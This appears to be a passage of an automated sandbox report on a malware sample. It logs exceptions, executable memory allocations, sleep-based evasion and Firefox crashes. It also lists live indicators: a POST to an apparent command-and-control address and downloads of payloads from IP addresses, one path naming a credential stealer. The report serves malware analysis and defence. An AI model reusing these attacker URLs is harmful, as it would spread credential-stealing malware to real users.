__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb e9 a6 02 00 00 51 e9 b9 03 00 00 89 34 24 be exception.symbol: random+0x245efa exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2383610 exception.address: 0x1445efa registers.esp: 1964036 registers.edi: 4294942240 registers.eax: 29299 registers.ebp: 4009340948 registers.edx: 1376585969 registers.ebx: 518795942 registers.esi: 21257949 registers.ecx: 3179896928	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb e9 aa 01 00 00 89 0c 24 b9 04 00 00 00 01 ca exception.symbol: random+0x24666a exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2385514 exception.address: 0x144666a registers.esp: 1964040 registers.edi: 4294942240 registers.eax: 29299 registers.ebp: 4009340948 registers.edx: 1376585969 registers.ebx: 518795942 registers.esi: 21287248 registers.ecx: 3179896928	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb e9 3f fd ff ff be ac 42 3b 3b 50 b8 17 ae fe exception.symbol: random+0x2466ca exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2385610 exception.address: 0x14466ca registers.esp: 1964040 registers.edi: 4294942240 registers.eax: 2476051296 registers.ebp: 4009340948 registers.edx: 1376585969 registers.ebx: 518795942 registers.esi: 21287248 registers.ecx: 4294940796	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 31 ff 52 89 e2 e9 d1 fd ff ff 87 14 24 5c 89 exception.symbol: random+0x247730 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2389808 exception.address: 0x1447730 registers.esp: 1964040 registers.edi: 21261417 registers.eax: 21291273 registers.ebp: 4009340948 registers.edx: 663695602 registers.ebx: 518795942 registers.esi: 0 registers.ecx: 0	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 68 55 88 19 1c 89 3c 24 bf 00 c7 ee 3f 52 ba exception.symbol: random+0x246fb7 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2387895 exception.address: 0x1446fb7 registers.esp: 1964040 registers.edi: 4294940456 registers.eax: 21291273 registers.ebp: 4009340948 registers.edx: 663695602 registers.ebx: 518795942 registers.esi: 0 registers.ecx: 1505268584	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 68 0e ba e5 27 89 14 24 51 56 89 1c 24 c7 04 exception.symbol: random+0x2482cb exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2392779 exception.address: 0x14482cb registers.esp: 1964040 registers.edi: 21267876 registers.eax: 31664 registers.ebp: 4009340948 registers.edx: 663695602 registers.ebx: 491142118 registers.esi: 722443661 registers.ecx: 0	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 81 c3 40 29 bf 12 e9 f9 03 00 00 53 68 92 32 exception.symbol: random+0x24f4e7 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2421991 exception.address: 0x144f4e7 registers.esp: 1964036 registers.edi: 4022154672 registers.eax: 31465 registers.ebp: 4009340948 registers.edx: 21282688 registers.ebx: 21296183 registers.esi: 743711537 registers.ecx: 42570023	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 29 f6 ff 34 1e ff 34 24 8b 04 24 81 c4 04 00 exception.symbol: random+0x24f976 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2423158 exception.address: 0x144f976 registers.esp: 1964040 registers.edi: 4022154672 registers.eax: 31465 registers.ebp: 4009340948 registers.edx: 21282688 registers.ebx: 21327648 registers.esi: 743711537 registers.ecx: 42570023	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb e9 00 00 00 00 ba f0 fa fe 3f 57 89 1c 24 e9 exception.symbol: random+0x24fdff exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2424319 exception.address: 0x144fdff registers.esp: 1964040 registers.edi: 4022154672 registers.eax: 7203152 registers.ebp: 4009340948 registers.edx: 21282688 registers.ebx: 21327648 registers.esi: 4294938440 registers.ecx: 42570023	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 68 bd 7a 74 0c 89 0c 24 89 3c 24 e9 c4 fc ff exception.symbol: random+0x251cf6 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2432246 exception.address: 0x1451cf6 registers.esp: 1964040 registers.edi: 21307898 registers.eax: 30932 registers.ebp: 4009340948 registers.edx: 6482262 registers.ebx: 0 registers.esi: 4022125816 registers.ecx: 88438061	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 68 d2 2e d9 23 89 34 24 89 04 24 e9 be 01 00 exception.symbol: random+0x2526c4 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2434756 exception.address: 0x14526c4 registers.esp: 1964040 registers.edi: 21307898 registers.eax: 21337830 registers.ebp: 4009340948 registers.edx: 1039895180 registers.ebx: 4294940784 registers.esi: 81129 registers.ecx: 1156604970	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 68 e3 a1 bd 75 89 2c 24 c7 04 24 54 32 23 01 exception.symbol: random+0x25ca5c exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2476636 exception.address: 0x145ca5c registers.esp: 1964036 registers.edi: 21313822 registers.eax: 32037 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 21348795 registers.esi: 21316183 registers.ecx: 2124349440	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb e9 5a 02 00 00 53 bb 70 18 80 00 31 5c 24 04 exception.symbol: random+0x25c536 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2475318 exception.address: 0x145c536 registers.esp: 1964040 registers.edi: 21313822 registers.eax: 32037 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 21380832 registers.esi: 21316183 registers.ecx: 2124349440	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 51 57 68 f9 87 f3 4d ff 34 24 5f 51 89 e1 81 exception.symbol: random+0x25cada exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2476762 exception.address: 0x145cada registers.esp: 1964040 registers.edi: 21313822 registers.eax: 4294937944 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 21380832 registers.esi: 1457686866 registers.ecx: 2124349440	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 50 68 18 62 af 7e 58 29 c7 e9 00 00 00 00 58 exception.symbol: random+0x26a672 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2532978 exception.address: 0x146a672 registers.esp: 1964036 registers.edi: 21405086 registers.eax: 29691 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 1971716070 registers.esi: 4309256 registers.ecx: 0	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 29 f6 ff 34 3e ff 34 24 5b 50 e9 65 ff ff ff exception.symbol: random+0x269ff8 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2531320 exception.address: 0x1469ff8 registers.esp: 1964040 registers.edi: 21434777 registers.eax: 29691 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 1971716070 registers.esi: 4309256 registers.ecx: 0	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 56 c7 04 24 b5 9b b9 56 81 04 24 7e 09 0d b7 exception.symbol: random+0x269ec2 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2531010 exception.address: 0x1469ec2 registers.esp: 1964040 registers.edi: 21434777 registers.eax: 29691 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 322689 registers.esi: 4294940200 registers.ecx: 0	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb ba 7c d9 6e 1f e9 66 01 00 00 5d 81 c1 f1 79 exception.symbol: random+0x276213 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2581011 exception.address: 0x1476213 registers.esp: 1964040 registers.edi: 21481916 registers.eax: 607453008 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 21408899 registers.esi: 21408895 registers.ecx: 4294941896	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.215.113.19/Vi9leo/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.16/stealc/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.16/well/random.exe

Performs some HTTP requests (3 events)

request	POST http://185.215.113.19/Vi9leo/index.php
request	GET http://185.215.113.16/stealc/random.exe
request	GET http://185.215.113.16/well/random.exe

Sends data using the HTTP POST Method (1 event)

request

POST http://185.215.113.19/Vi9leo/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 220 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 188416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01201000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00600000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00db0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00dc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00dd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01090000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73402000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03180000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:28 p.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000046d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 188416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ce1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ba0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2024, 12:34 p.m.	process_identifier: 2824 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (2 events)

description	explorti.exe tried to sleep 1193 seconds, actually delayed analysis time by 1193 seconds
description	a0c68cc885.exe tried to sleep 285 seconds, actually delayed analysis time by 285 seconds

An application raised an exception which may be indicative of an exploit crash (14 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process firefox.exe with pid 2216 crashed
Application Crash	Process firefox.exe with pid 1528 crashed
Application Crash	Process firefox.exe with pid 2276 crashed
Application Crash	Process firefox.exe with pid 1252 crashed
Application Crash	Process firefox.exe with pid 736 crashed
Application Crash	Process firefox.exe with pid 1320 crashed
Application Crash	Process firefox.exe with pid 1784 crashed
__exception__ July 27, 2024, 12:27 p.m.	stacktrace: 0xcd1f04 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 9302120 registers.r15: 8791562491504 registers.rcx: 48 registers.rsi: 8791562423168 registers.r10: 0 registers.rbx: 0 registers.rsp: 9301752 registers.r11: 9305136 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 14918496 registers.rbp: 9301872 registers.rdi: 272736288 registers.rax: 13442816 registers.r13: 9302712	1	0	0
__exception__ July 27, 2024, 12:28 p.m.	stacktrace: 0xa91f04 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa91f04 registers.r14: 9368184 registers.r15: 8791561442928 registers.rcx: 48 registers.rsi: 8791561374592 registers.r10: 0 registers.rbx: 0 registers.rsp: 9367816 registers.r11: 9371200 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 15964912 registers.rbp: 9367936 registers.rdi: 254915776 registers.rax: 11083520 registers.r13: 9368776	1	0	0
